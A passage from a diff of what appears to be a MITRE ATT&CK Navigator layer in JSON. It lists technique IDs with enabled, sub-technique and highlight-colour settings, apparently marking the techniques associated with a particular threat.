"showSubtechniques": true, + "techniqueID": "T1056" + }, + { + "color": "#7a34eb", + "techniqueID": "T1056.001" + }, + { + "enabled": false, + "techniqueID": "T1056.002" + }, + { + "enabled": false, + "techniqueID": "T1056.003" + }, + { + "enabled": false, + "techniqueID": "T1056.004" + }, + { + "enabled": false, + "techniqueID": "T1057" + }, + { + "enabled": false, + "techniqueID": "T1058" + }, + { + "enabled": false, + "techniqueID": "T1059" + }, + { + "enabled": false, + "techniqueID": "T1059.001" + }, + { + "enabled": false, + "techniqueID": "T1059.002" + }, + { + "enabled": false, + "techniqueID": "T1059.003" + }, + { + "enabled": false, + "techniqueID": "T1059.004" + }, + { + "enabled": false, + "techniqueID": "T1059.005" + }, + { + "enabled": false, + "techniqueID": "T1059.006" + }, + { + "enabled": false, + "techniqueID": "T1059.007" + }, + { + "enabled": false, + "techniqueID": "T1059.008" + }, + { + "enabled": false, + "techniqueID": "T1059.009" + }, + { + "enabled": false, + "techniqueID": "T1060" + }, + { + "enabled": false, + "techniqueID": "T1061" + }, + { + "enabled": false, + "techniqueID": "T1062" + }, + { + "enabled": false, + "techniqueID": "T1063" + }, + { + "enabled": false, + "techniqueID": "T1064" + }, + { + "enabled": false, + "techniqueID": "T1065" + }, + { + "enabled": false, + "techniqueID": "T1066" + }, + { + "enabled": false, + "techniqueID": "T1067" + }, + { + "enabled": false, + "techniqueID": "T1068" + }, + { + "enabled": false, + "techniqueID": "T1069" + }, + { + "enabled": false, + "techniqueID": "T1069.001" + }, + { + "enabled": false, + "techniqueID": "T1069.002" + }, + { + "enabled": false, + "techniqueID": "T1069.003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1070" + }, + { + "color": "#7a34eb", + "techniqueID": "T1070.001" + }, + { + "enabled": false, + "techniqueID": "T1070.002" + }, + { + "enabled": false, + "techniqueID": "T1070.003" + }, + { + "enabled": false, + "techniqueID": "T1070.004" + }, + { + 
"enabled": false, + "techniqueID": "T1070.005" + }, + { + "enabled": false, + "techniqueID": "T1070.006" + }, + { + "enabled": false, + "techniqueID": "T1070.007" + }, + { + "enabled": false, + "techniqueID": "T1070.008" + }, + { + "enabled": false, + "techniqueID": "T1070.009" + }, + { + "showSubtechniques": true, + "techniqueID": "T1071" + }, + { + "showSubtechniques": true, + "techniqueID": "T1071" + }, + { + "color": "#7a34eb", + "techniqueID": "T1071.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1071.001" + }, + { + "enabled": false, + "techniqueID": "T1071.002" + }, + { + "enabled": false, + "techniqueID": "T1071.003" + }, + { + "enabled": false, + "techniqueID": "T1071.004" + }, + { + "enabled": false, + "techniqueID": "T1072" + }, + { + "enabled": false, + "techniqueID": "T1073" + }, + { + "enabled": false, + "techniqueID": "T1074" + }, + { + "enabled": false, + "techniqueID": "T1074.001" + }, + { + "enabled": false, + "techniqueID": "T1074.002" + }, + { + "enabled": false, + "techniqueID": "T1075" + }, + { + "enabled": false, + "techniqueID": "T1076" + }, + { + "enabled": false, + "techniqueID": "T1077" + }, + { + "color": "#7a34eb", + "techniqueID": "T1078" + }, + { + "color": "#7a34eb", + "techniqueID": "T1078" + }, + { + "enabled": false, + "techniqueID": "T1078.001" + }, + { + "enabled": false, + "techniqueID": "T1078.002" + }, + { + "enabled": false, + "techniqueID": "T1078.003" + }, + { + "enabled": false, + "techniqueID": "T1078.004" + }, + { + "enabled": false, + "techniqueID": "T1079" + }, + { + "enabled": false, + "techniqueID": "T1080" + }, + { + "enabled": false, + "techniqueID": "T1081" + }, + { + "color": "#7a34eb", + "techniqueID": "T1082" + }, + { + "enabled": false, + "techniqueID": "T1083" + }, + { + "enabled": false, + "techniqueID": "T1084" + }, + { + "enabled": false, + "techniqueID": "T1085" + }, + { + "enabled": false, + "techniqueID": "T1086" + }, + { + "showSubtechniques": true, + "techniqueID": "T1087" + }, + { + 
"showSubtechniques": true, + "techniqueID": "T1087" + }, + { + "enabled": false, + "techniqueID": "T1087.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1087.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1087.002" + }, + { + "enabled": false, + "techniqueID": "T1087.003" + }, + { + "enabled": false, + "techniqueID": "T1087.004" + }, + { + "enabled": false, + "techniqueID": "T1088" + }, + { + "enabled": false, + "techniqueID": "T1089" + }, + { + "enabled": false, + "techniqueID": "T1090" + }, + { + "enabled": false, + "techniqueID": "T1090.001" + }, + { + "enabled": false, + "techniqueID": "T1090.002" + }, + { + "enabled": false, + "techniqueID": "T1090.003" + }, + { + "enabled": false, + "techniqueID": "T1090.004" + }, + { + "enabled": false, + "techniqueID": "T1091" + }, + { + "enabled": false, + "techniqueID": "T1092" + }, + { + "enabled": false, + "techniqueID": "T1093" + }, + { + "enabled": false, + "techniqueID": "T1094" + }, + { + "enabled": false, + "techniqueID": "T1095" + }, + { + "enabled": false, + "techniqueID": "T1096" + }, + { + "enabled": false, + "techniqueID": "T1097" + }, + { + "showSubtechniques": true, + "techniqueID": "T1098" + }, + { + "enabled": false, + "techniqueID": "T1098.001" + }, + { + "enabled": false, + "techniqueID": "T1098.002" + }, + { + "enabled": false, + "techniqueID": "T1098.003" + }, + { + "enabled": false, + "techniqueID": "T1098.004" + }, + { + "color": "#7a34eb", + "techniqueID": "T1098.005" + }, + { + "enabled": false, + "techniqueID": "T1098.006" + }, + { + "enabled": false, + "techniqueID": "T1099" + }, + { + "enabled": false, + "techniqueID": "T1100" + }, + { + "enabled": false, + "techniqueID": "T1101" + }, + { + "showSubtechniques": true, + "techniqueID": "T1102" + }, + { + "enabled": false, + "techniqueID": "T1102.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1102.002" + }, + { + "enabled": false, + "techniqueID": "T1102.003" + }, + { + "enabled": false, + "techniqueID": "T1103" + }, + { + 
"enabled": false, + "techniqueID": "T1104" + }, + { + "color": "#7a34eb", + "techniqueID": "T1105" + }, + { + "enabled": false, + "techniqueID": "T1106" + }, + { + "enabled": false, + "techniqueID": "T1107" + }, + { + "enabled": false, + "techniqueID": "T1108" + }, + { + "enabled": false, + "techniqueID": "T1109" + }, + { + "showSubtechniques": true, + "techniqueID": "T1110" + }, + { + "enabled": false, + "techniqueID": "T1110.001" + }, + { + "enabled": false, + "techniqueID": "T1110.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1110.003" + }, + { + "enabled": false, + "techniqueID": "T1110.004" + }, + { + "enabled": false, + "techniqueID": "T1111" + }, + { + "color": "#7a34eb", + "techniqueID": "T1112" + }, + { + "color": "#7a34eb", + "techniqueID": "T1113" + }, + { + "enabled": false, + "techniqueID": "T1114" + }, + { + "enabled": false, + "techniqueID": "T1114.001" + }, + { + "enabled": false, + "techniqueID": "T1114.002" + }, + { + "enabled": false, + "techniqueID": "T1114.003" + }, + { + "enabled": false, + "techniqueID": "T1115" + }, + { + "enabled": false, + "techniqueID": "T1116" + }, + { + "enabled": false, + "techniqueID": "T1117" + }, + { + "enabled": false, + "techniqueID": "T1118" + }, + { + "enabled": false, + "techniqueID": "T1119" + }, + { + "enabled": false, + "techniqueID": "T1120" + }, + { + "enabled": false, + "techniqueID": "T1121" + }, + { + "enabled": false, + "techniqueID": "T1122" + }, + { + "enabled": false, + "techniqueID": "T1123" + }, + { + "enabled": false, + "techniqueID": "T1124" + }, + { + "enabled": false, + "techniqueID": "T1125" + }, + { + "enabled": false, + "techniqueID": "T1126" + }, + { + "enabled": false, + "techniqueID": "T1127" + }, + { + "enabled": false, + "techniqueID": "T1127.001" + }, + { + "enabled": false, + "techniqueID": "T1128" + }, + { + "enabled": false, + "techniqueID": "T1129" + }, + { + "enabled": false, + "techniqueID": "T1130" + }, + { + "enabled": false, + "techniqueID": "T1131" + }, + { + 
"enabled": false, + "techniqueID": "T1132" + }, + { + "enabled": false, + "techniqueID": "T1132.001" + }, + { + "enabled": false, + "techniqueID": "T1132.002" + }, + { + "enabled": false, + "techniqueID": "T1133" + }, + { + "enabled": false, + "techniqueID": "T1134" + }, + { + "enabled": false, + "techniqueID": "T1134.001" + }, + { + "enabled": false, + "techniqueID": "T1134.002" + }, + { + "enabled": false, + "techniqueID": "T1134.003" + }, + { + "enabled": false, + "techniqueID": "T1134.004" + }, + { + "enabled": false, + "techniqueID": "T1134.005" + }, + { + "enabled": false, + "techniqueID": "T1135" + }, + { + "enabled": false, + "techniqueID": "T1136" + }, + { + "enabled": false, + "techniqueID": "T1136.001" + }, + { + "enabled": false, + "techniqueID": "T1136.002" + }, + { + "enabled": false, + "techniqueID": "T1136.003" + }, + { + "enabled": false, + "techniqueID": "T1137" + }, + { + "enabled": false, + "techniqueID": "T1137.001" + }, + { + "enabled": false, + "techniqueID": "T1137.002" + }, + { + "enabled": false, + "techniqueID": "T1137.003" + }, + { + "enabled": false, + "techniqueID": "T1137.004" + }, + { + "enabled": false, + "techniqueID": "T1137.005" + }, + { + "enabled": false, + "techniqueID": "T1137.006" + }, + { + "enabled": false, + "techniqueID": "T1138" + }, + { + "enabled": false, + "techniqueID": "T1139" + }, + { + "enabled": false, + "techniqueID": "T1140" + }, + { + "enabled": false, + "techniqueID": "T1141" + }, + { + "enabled": false, + "techniqueID": "T1142" + }, + { + "enabled": false, + "techniqueID": "T1143" + }, + { + "enabled": false, + "techniqueID": "T1144" + }, + { + "enabled": false, + "techniqueID": "T1145" + }, + { + "enabled": false, + "techniqueID": "T1146" + }, + { + "enabled": false, + "techniqueID": "T1147" + }, + { + "enabled": false, + "techniqueID": "T1148" + }, + { + "enabled": false, + "techniqueID": "T1149" + }, + { + "enabled": false, + "techniqueID": "T1150" + }, + { + "enabled": false, + "techniqueID": "T1151" + 
}, + { + "enabled": false, + "techniqueID": "T1152" + }, + { + "enabled": false, + "techniqueID": "T1153" + }, + { + "enabled": false, + "techniqueID": "T1154" + }, + { + "enabled": false, + "techniqueID": "T1155" + }, + { + "enabled": false, + "techniqueID": "T1156" + }, + { + "enabled": false, + "techniqueID": "T1157" + }, + { + "enabled": false, + "techniqueID": "T1158" + }, + { + "enabled": false, + "techniqueID": "T1159" + }, + { + "enabled": false, + "techniqueID": "T1160" + }, + { + "enabled": false, + "techniqueID": "T1161" + }, + { + "enabled": false, + "techniqueID": "T1162" + }, + { + "enabled": false, + "techniqueID": "T1163" + }, + { + "enabled": false, + "techniqueID": "T1164" + }, + { + "enabled": false, + "techniqueID": "T1165" + }, + { + "enabled": false, + "techniqueID": "T1166" + }, + { + "enabled": false, + "techniqueID": "T1167" + }, + { + "enabled": false, + "techniqueID": "T1168" + }, + { + "enabled": false, + "techniqueID": "T1169" + }, + { + "enabled": false, + "techniqueID": "T1170" + }, + { + "enabled": false, + "techniqueID": "T1171" + }, + { + "enabled": false, + "techniqueID": "T1172" + }, + { + "enabled": false, + "techniqueID": "T1173" + }, + { + "enabled": false, + "techniqueID": "T1174" + }, + { + "enabled": false, + "techniqueID": "T1175" + }, + { + "enabled": false, + "techniqueID": "T1176" + }, + { + "enabled": false, + "techniqueID": "T1177" + }, + { + "enabled": false, + "techniqueID": "T1178" + }, + { + "enabled": false, + "techniqueID": "T1179" + }, + { + "enabled": false, + "techniqueID": "T1180" + }, + { + "enabled": false, + "techniqueID": "T1181" + }, + { + "enabled": false, + "techniqueID": "T1182" + }, + { + "enabled": false, + "techniqueID": "T1183" + }, + { + "enabled": false, + "techniqueID": "T1184" + }, + { + "enabled": false, + "techniqueID": "T1185" + }, + { + "enabled": false, + "techniqueID": "T1186" + }, + { + "enabled": false, + "techniqueID": "T1187" + }, + { + "enabled": false, + "techniqueID": "T1188" + 
}, + { + "enabled": false, + "techniqueID": "T1189" + }, + { + "enabled": false, + "techniqueID": "T1190" + }, + { + "enabled": false, + "techniqueID": "T1191" + }, + { + "enabled": false, + "techniqueID": "T1192" + }, + { + "enabled": false, + "techniqueID": "T1193" + }, + { + "enabled": false, + "techniqueID": "T1194" + }, + { + "enabled": false, + "techniqueID": "T1195" + }, + { + "enabled": false, + "techniqueID": "T1195.001" + }, + { + "enabled": false, + "techniqueID": "T1195.002" + }, + { + "enabled": false, + "techniqueID": "T1195.003" + }, + { + "enabled": false, + "techniqueID": "T1196" + }, + { + "enabled": false, + "techniqueID": "T1197" + }, + { + "enabled": false, + "techniqueID": "T1198" + }, + { + "enabled": false, + "techniqueID": "T1199" + }, + { + "enabled": false, + "techniqueID": "T1200" + }, + { + "enabled": false, + "techniqueID": "T1201" + }, + { + "enabled": false, + "techniqueID": "T1202" + }, + { + "enabled": false, + "techniqueID": "T1203" + }, + { + "enabled": false, + "techniqueID": "T1204" + }, + { + "enabled": false, + "techniqueID": "T1204.001" + }, + { + "enabled": false, + "techniqueID": "T1204.002" + }, + { + "enabled": false, + "techniqueID": "T1204.003" + }, + { + "enabled": false, + "techniqueID": "T1205" + }, + { + "enabled": false, + "techniqueID": "T1205.001" + }, + { + "enabled": false, + "techniqueID": "T1205.002" + }, + { + "enabled": false, + "techniqueID": "T1206" + }, + { + "enabled": false, + "techniqueID": "T1207" + }, + { + "enabled": false, + "techniqueID": "T1208" + }, + { + "enabled": false, + "techniqueID": "T1209" + }, + { + "enabled": false, + "techniqueID": "T1210" + }, + { + "enabled": false, + "techniqueID": "T1211" + }, + { + "enabled": false, + "techniqueID": "T1212" + }, + { + "enabled": false, + "techniqueID": "T1213" + }, + { + "enabled": false, + "techniqueID": "T1213.001" + }, + { + "enabled": false, + "techniqueID": "T1213.002" + }, + { + "enabled": false, + "techniqueID": "T1213.003" + }, + { + 
"enabled": false, + "techniqueID": "T1214" + }, + { + "enabled": false, + "techniqueID": "T1215" + }, + { + "enabled": false, + "techniqueID": "T1216" + }, + { + "enabled": false, + "techniqueID": "T1216.001" + }, + { + "enabled": false, + "techniqueID": "T1217" + }, + { + "showSubtechniques": true, + "techniqueID": "T1218" + }, + { + "enabled": false, + "techniqueID": "T1218.001" + }, + { + "enabled": false, + "techniqueID": "T1218.002" + }, + { + "enabled": false, + "techniqueID": "T1218.003" + }, + { + "enabled": false, + "techniqueID": "T1218.004" + }, + { + "enabled": false, + "techniqueID": "T1218.005" + }, + { + "enabled": false, + "techniqueID": "T1218.007" + }, + { + "enabled": false, + "techniqueID": "T1218.008" + }, + { + "enabled": false, + "techniqueID": "T1218.009" + }, + { + "enabled": false, + "techniqueID": "T1218.010" + }, + { + "color": "#7a34eb", + "techniqueID": "T1218.011" + }, + { + "enabled": false, + "techniqueID": "T1218.012" + }, + { + "enabled": false, + "techniqueID": "T1218.013" + }, + { + "enabled": false, + "techniqueID": "T1218.014" + }, + { + "color": "#7a34eb", + "techniqueID": "T1219" + }, + { + "enabled": false, + "techniqueID": "T1220" + }, + { + "color": "#7a34eb", + "techniqueID": "T1221" + }, + { + "enabled": false, + "techniqueID": "T1222" + }, + { + "enabled": false, + "techniqueID": "T1222.001" + }, + { + "enabled": false, + "techniqueID": "T1222.002" + }, + { + "enabled": false, + "techniqueID": "T1223" + }, + { + "enabled": false, + "techniqueID": "T1480" + }, + { + "enabled": false, + "techniqueID": "T1480.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1482" + }, + { + "enabled": false, + "techniqueID": "T1483" + }, + { + "color": "#7a34eb", + "techniqueID": "T1484" + }, + { + "showSubtechniques": true, + "techniqueID": "T1484" + }, + { + "showSubtechniques": true, + "techniqueID": "T1484" + }, + { + "color": "#7a34eb", + "techniqueID": "T1484.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1484.002" + 
}, + { + "enabled": false, + "techniqueID": "T1485" + }, + { + "color": "#7a34eb", + "techniqueID": "T1486" + }, + { + "enabled": false, + "techniqueID": "T1487" + }, + { + "enabled": false, + "techniqueID": "T1488" + }, + { + "enabled": false, + "techniqueID": "T1489" + }, + { + "color": "#7a34eb", + "techniqueID": "T1490" + }, + { + "enabled": false, + "techniqueID": "T1491" + }, + { + "enabled": false, + "techniqueID": "T1491.001" + }, + { + "enabled": false, + "techniqueID": "T1491.002" + }, + { + "enabled": false, + "techniqueID": "T1492" + }, + { + "enabled": false, + "techniqueID": "T1493" + }, + { + "enabled": false, + "techniqueID": "T1494" + }, + { + "enabled": false, + "techniqueID": "T1495" + }, + { + "enabled": false, + "techniqueID": "T1496" + }, + { + "enabled": false, + "techniqueID": "T1497" + }, + { + "enabled": false, + "techniqueID": "T1497.001" + }, + { + "enabled": false, + "techniqueID": "T1497.002" + }, + { + "enabled": false, + "techniqueID": "T1497.003" + }, + { + "enabled": false, + "techniqueID": "T1498" + }, + { + "enabled": false, + "techniqueID": "T1498.001" + }, + { + "enabled": false, + "techniqueID": "T1498.002" + }, + { + "enabled": false, + "techniqueID": "T1499" + }, + { + "enabled": false, + "techniqueID": "T1499.001" + }, + { + "enabled": false, + "techniqueID": "T1499.002" + }, + { + "enabled": false, + "techniqueID": "T1499.003" + }, + { + "enabled": false, + "techniqueID": "T1499.004" + }, + { + "enabled": false, + "techniqueID": "T1500" + }, + { + "enabled": false, + "techniqueID": "T1501" + }, + { + "enabled": false, + "techniqueID": "T1502" + }, + { + "enabled": false, + "techniqueID": "T1503" + }, + { + "enabled": false, + "techniqueID": "T1504" + }, + { + "enabled": false, + "techniqueID": "T1505" + }, + { + "enabled": false, + "techniqueID": "T1505.001" + }, + { + "enabled": false, + "techniqueID": "T1505.002" + }, + { + "enabled": false, + "techniqueID": "T1505.003" + }, + { + "enabled": false, + "techniqueID": 
"T1505.004" + }, + { + "enabled": false, + "techniqueID": "T1505.005" + }, + { + "enabled": false, + "techniqueID": "T1506" + }, + { + "enabled": false, + "techniqueID": "T1514" + }, + { + "enabled": false, + "techniqueID": "T1518" + }, + { + "enabled": false, + "techniqueID": "T1518.001" + }, + { + "enabled": false, + "techniqueID": "T1519" + }, + { + "enabled": false, + "techniqueID": "T1522" + }, + { + "enabled": false, + "techniqueID": "T1525" + }, + { + "enabled": false, + "techniqueID": "T1526" + }, + { + "enabled": false, + "techniqueID": "T1527" + }, + { + "enabled": false, + "techniqueID": "T1528" + }, + { + "enabled": false, + "techniqueID": "T1529" + }, + { + "enabled": false, + "techniqueID": "T1530" + }, + { + "enabled": false, + "techniqueID": "T1531" + }, + { + "enabled": false, + "techniqueID": "T1534" + }, + { + "enabled": false, + "techniqueID": "T1535" + }, + { + "enabled": false, + "techniqueID": "T1536" + }, + { + "enabled": false, + "techniqueID": "T1537" + }, + { + "enabled": false, + "techniqueID": "T1538" + }, + { + "enabled": false, + "techniqueID": "T1539" + }, + { + "enabled": false, + "techniqueID": "T1542" + }, + { + "enabled": false, + "techniqueID": "T1542.001" + }, + { + "enabled": false, + "techniqueID": "T1542.002" + }, + { + "enabled": false, + "techniqueID": "T1542.003" + }, + { + "enabled": false, + "techniqueID": "T1542.004" + }, + { + "enabled": false, + "techniqueID": "T1542.005" + }, + { + "showSubtechniques": true, + "techniqueID": "T1543" + }, + { + "enabled": false, + "techniqueID": "T1543.001" + }, + { + "enabled": false, + "techniqueID": "T1543.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1543.003" + }, + { + "enabled": false, + "techniqueID": "T1543.004" + }, + { + "enabled": false, + "techniqueID": "T1546" + }, + { + "enabled": false, + "techniqueID": "T1546.001" + }, + { + "enabled": false, + "techniqueID": "T1546.002" + }, + { + "enabled": false, + "techniqueID": "T1546.003" + }, + { + "enabled": false, + 
"techniqueID": "T1546.004" + }, + { + "enabled": false, + "techniqueID": "T1546.005" + }, + { + "enabled": false, + "techniqueID": "T1546.006" + }, + { + "enabled": false, + "techniqueID": "T1546.007" + }, + { + "enabled": false, + "techniqueID": "T1546.008" + }, + { + "enabled": false, + "techniqueID": "T1546.009" + }, + { + "enabled": false, + "techniqueID": "T1546.010" + }, + { + "enabled": false, + "techniqueID": "T1546.011" + }, + { + "enabled": false, + "techniqueID": "T1546.012" + }, + { + "enabled": false, + "techniqueID": "T1546.013" + }, + { + "enabled": false, + "techniqueID": "T1546.014" + }, + { + "enabled": false, + "techniqueID": "T1546.015" + }, + { + "enabled": false, + "techniqueID": "T1546.016" + }, + { + "showSubtechniques": true, + "techniqueID": "T1547" + }, + { + "showSubtechniques": true, + "techniqueID": "T1547" + }, + { + "enabled": false, + "techniqueID": "T1547.001" + }, + { + "enabled": false, + "techniqueID": "T1547.002" + }, + { + "enabled": false, + "techniqueID": "T1547.003" + }, + { + "color": "#7a34eb", + "techniqueID": "T1547.004" + }, + { + "color": "#7a34eb", + "techniqueID": "T1547.005" + }, + { + "enabled": false, + "techniqueID": "T1547.006" + }, + { + "enabled": false, + "techniqueID": "T1547.007" + }, + { + "enabled": false, + "techniqueID": "T1547.008" + }, + { + "enabled": false, + "techniqueID": "T1547.009" + }, + { + "enabled": false, + "techniqueID": "T1547.010" + }, + { + "enabled": false, + "techniqueID": "T1547.011" + }, + { + "enabled": false, + "techniqueID": "T1547.012" + }, + { + "enabled": false, + "techniqueID": "T1547.013" + }, + { + "enabled": false, + "techniqueID": "T1547.014" + }, + { + "enabled": false, + "techniqueID": "T1547.015" + }, + { + "showSubtechniques": true, + "techniqueID": "T1548" + }, + { + "enabled": false, + "techniqueID": "T1548.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1548.002" + }, + { + "enabled": false, + "techniqueID": "T1548.003" + }, + { + "enabled": false, + 
"techniqueID": "T1548.004" + }, + { + "enabled": false, + "techniqueID": "T1548.005" + }, + { + "enabled": false, + "techniqueID": "T1550" + }, + { + "enabled": false, + "techniqueID": "T1550.001" + }, + { + "enabled": false, + "techniqueID": "T1550.002" + }, + { + "enabled": false, + "techniqueID": "T1550.003" + }, + { + "enabled": false, + "techniqueID": "T1550.004" + }, + { + "enabled": false, + "techniqueID": "T1552" + }, + { + "enabled": false, + "techniqueID": "T1552.001" + }, + { + "enabled": false, + "techniqueID": "T1552.002" + }, + { + "enabled": false, + "techniqueID": "T1552.003" + }, + { + "enabled": false, + "techniqueID": "T1552.004" + }, + { + "enabled": false, + "techniqueID": "T1552.005" + }, + { + "enabled": false, + "techniqueID": "T1552.006" + }, + { + "enabled": false, + "techniqueID": "T1552.007" + }, + { + "enabled": false, + "techniqueID": "T1552.008" + }, + { + "enabled": false, + "techniqueID": "T1553" + }, + { + "enabled": false, + "techniqueID": "T1553.001" + }, + { + "enabled": false, + "techniqueID": "T1553.002" + }, + { + "enabled": false, + "techniqueID": "T1553.003" + }, + { + "enabled": false, + "techniqueID": "T1553.004" + }, + { + "enabled": false, + "techniqueID": "T1553.005" + }, + { + "enabled": false, + "techniqueID": "T1553.006" + }, + { + "enabled": false, + "techniqueID": "T1554" + }, + { + "showSubtechniques": true, + "techniqueID": "T1555" + }, + { + "enabled": false, + "techniqueID": "T1555.001" + }, + { + "enabled": false, + "techniqueID": "T1555.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1555.003" + }, + { + "enabled": false, + "techniqueID": "T1555.004" + }, + { + "enabled": false, + "techniqueID": "T1555.005" + }, + { + "enabled": false, + "techniqueID": "T1555.006" + }, + { + "enabled": false, + "techniqueID": "T1556" + }, + { + "enabled": false, + "techniqueID": "T1556.001" + }, + { + "enabled": false, + "techniqueID": "T1556.002" + }, + { + "enabled": false, + "techniqueID": "T1556.003" + }, + { + 
"enabled": false, + "techniqueID": "T1556.004" + }, + { + "enabled": false, + "techniqueID": "T1556.005" + }, + { + "enabled": false, + "techniqueID": "T1556.006" + }, + { + "enabled": false, + "techniqueID": "T1556.007" + }, + { + "enabled": false, + "techniqueID": "T1556.008" + }, + { + "enabled": false, + "techniqueID": "T1557" + }, + { + "enabled": false, + "techniqueID": "T1557.001" + }, + { + "enabled": false, + "techniqueID": "T1557.002" + }, + { + "enabled": false, + "techniqueID": "T1557.003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1558" + }, + { + "enabled": false, + "techniqueID": "T1558.001" + }, + { + "enabled": false, + "techniqueID": "T1558.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1558.003" + }, + { + "enabled": false, + "techniqueID": "T1558.004" + }, + { + "enabled": false, + "techniqueID": "T1559" + }, + { + "enabled": false, + "techniqueID": "T1559.001" + }, + { + "enabled": false, + "techniqueID": "T1559.002" + }, + { + "enabled": false, + "techniqueID": "T1559.003" + }, + { + "enabled": false, + "techniqueID": "T1560" + }, + { + "enabled": false, + "techniqueID": "T1560.001" + }, + { + "enabled": false, + "techniqueID": "T1560.002" + }, + { + "enabled": false, + "techniqueID": "T1560.003" + }, + { + "enabled": false, + "techniqueID": "T1561" + }, + { + "enabled": false, + "techniqueID": "T1561.001" + }, + { + "enabled": false, + "techniqueID": "T1561.002" + }, + { + "showSubtechniques": true, + "techniqueID": "T1562" + }, + { + "color": "#7a34eb", + "techniqueID": "T1562.001" + }, + { + "enabled": false, + "techniqueID": "T1562.002" + }, + { + "enabled": false, + "techniqueID": "T1562.003" + }, + { + "enabled": false, + "techniqueID": "T1562.004" + }, + { + "enabled": false, + "techniqueID": "T1562.006" + }, + { + "enabled": false, + "techniqueID": "T1562.007" + }, + { + "enabled": false, + "techniqueID": "T1562.008" + }, + { + "enabled": false, + "techniqueID": "T1562.009" + }, + { + "enabled": false, + 
"techniqueID": "T1562.010" + }, + { + "enabled": false, + "techniqueID": "T1562.011" + }, + { + "enabled": false, + "techniqueID": "T1562.012" + }, + { + "enabled": false, + "techniqueID": "T1563" + }, + { + "enabled": false, + "techniqueID": "T1563.001" + }, + { + "enabled": false, + "techniqueID": "T1563.002" + }, + { + "enabled": false, + "techniqueID": "T1564" + }, + { + "enabled": false, + "techniqueID": "T1564.001" + }, + { + "enabled": false, + "techniqueID": "T1564.002" + }, + { + "enabled": false, + "techniqueID": "T1564.003" + }, + { + "enabled": false, + "techniqueID": "T1564.004" + }, + { + "enabled": false, + "techniqueID": "T1564.005" + }, + { + "enabled": false, + "techniqueID": "T1564.006" + }, + { + "enabled": false, + "techniqueID": "T1564.007" + }, + { + "enabled": false, + "techniqueID": "T1564.008" + }, + { + "enabled": false, + "techniqueID": "T1564.009" + }, + { + "enabled": false, + "techniqueID": "T1564.010" + }, + { + "enabled": false, + "techniqueID": "T1564.011" + }, + { + "enabled": false, + "techniqueID": "T1565" + }, + { + "enabled": false, + "techniqueID": "T1565.001" + }, + { + "enabled": false, + "techniqueID": "T1565.002" + }, + { + "enabled": false, + "techniqueID": "T1565.003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1566" + }, + { + "showSubtechniques": true, + "techniqueID": "T1566" + }, + { + "color": "#7a34eb", + "techniqueID": "T1566.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1566.001" + }, + { + "enabled": false, + "techniqueID": "T1566.002" + }, + { + "enabled": false, + "techniqueID": "T1566.003" + }, + { + "enabled": false, + "techniqueID": "T1566.004" + }, + { + "showSubtechniques": true, + "techniqueID": "T1567" + }, + { + "enabled": false, + "techniqueID": "T1567.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1567.002" + }, + { + "enabled": false, + "techniqueID": "T1567.003" + }, + { + "enabled": false, + "techniqueID": "T1567.004" + }, + { + "enabled": false, + "techniqueID": 
"T1568" + }, + { + "enabled": false, + "techniqueID": "T1568.001" + }, + { + "enabled": false, + "techniqueID": "T1568.002" + }, + { + "enabled": false, + "techniqueID": "T1568.003" + }, + { + "enabled": false, + "techniqueID": "T1569" + }, + { + "enabled": false, + "techniqueID": "T1569.001" + }, + { + "enabled": false, + "techniqueID": "T1569.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1570" + }, + { + "enabled": false, + "techniqueID": "T1571" + }, + { + "enabled": false, + "techniqueID": "T1572" + }, + { + "enabled": false, + "techniqueID": "T1573" + }, + { + "enabled": false, + "techniqueID": "T1573.001" + }, + { + "enabled": false, + "techniqueID": "T1573.002" + }, + { + "showSubtechniques": true, + "techniqueID": "T1574" + }, + { + "enabled": false, + "techniqueID": "T1574.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1574.002" + }, + { + "enabled": false, + "techniqueID": "T1574.004" + }, + { + "enabled": false, + "techniqueID": "T1574.005" + }, + { + "enabled": false, + "techniqueID": "T1574.006" + }, + { + "enabled": false, + "techniqueID": "T1574.007" + }, + { + "enabled": false, + "techniqueID": "T1574.008" + }, + { + "enabled": false, + "techniqueID": "T1574.009" + }, + { + "enabled": false, + "techniqueID": "T1574.010" + }, + { + "enabled": false, + "techniqueID": "T1574.011" + }, + { + "enabled": false, + "techniqueID": "T1574.012" + }, + { + "enabled": false, + "techniqueID": "T1574.013" + }, + { + "enabled": false, + "techniqueID": "T1578" + }, + { + "enabled": false, + "techniqueID": "T1578.001" + }, + { + "enabled": false, + "techniqueID": "T1578.002" + }, + { + "enabled": false, + "techniqueID": "T1578.003" + }, + { + "enabled": false, + "techniqueID": "T1578.004" + }, + { + "enabled": false, + "techniqueID": "T1578.005" + }, + { + "enabled": false, + "techniqueID": "T1580" + }, + { + "enabled": false, + "techniqueID": "T1583" + }, + { + "enabled": false, + "techniqueID": "T1583.001" + }, + { + "enabled": false, + 
